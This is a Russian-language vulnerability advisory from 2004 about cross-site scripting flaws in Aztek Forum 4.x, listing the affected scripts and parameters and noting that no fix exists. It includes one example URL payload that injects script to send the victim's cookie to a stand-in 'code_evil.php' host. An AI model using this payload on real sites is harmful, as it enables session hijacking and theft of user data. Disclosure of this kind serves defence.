Межсайтовое выполнение сценариев в Aztek Forum

Дата публикации:
15.11.2004
Всего просмотров:
823
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Aztek Forum 4.x
Уязвимые версии: Aztek Forum

Описание:
Межсайтовое выполнение сценариев обнаружено в Aztek Forum. Удаленный атакующий может получить важные данные пользователей.

Уязвимость существует в нескольких сценариях при обработке входных данных. Удаленный атакующий может создать специально сформированный URL и выполнить произвольный HTML код в браузере жертвы. Пример:

http://[target]/forum%20aztek/forum_2.php?msg=10
& return=')%3C/script%3E%3Cscript%3E%20% 20document.location=%20'www.site.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E

Уязвимость существует при обработке переменных 'return' и 'title' сценария 'forum_2.php', при обработке поисковых запросов в файле 'search.php', а также в переменной 'email' файла 'subscribe.php'

URL производителя: www.forum-aztek.com

Решение: Решение не существует на данный момент.

Ссылки: Aztek Forum Input Validation Holes Lets Remote Users Conduct Cross-Site Scripting Attacks

или введите имя

CAPTCHA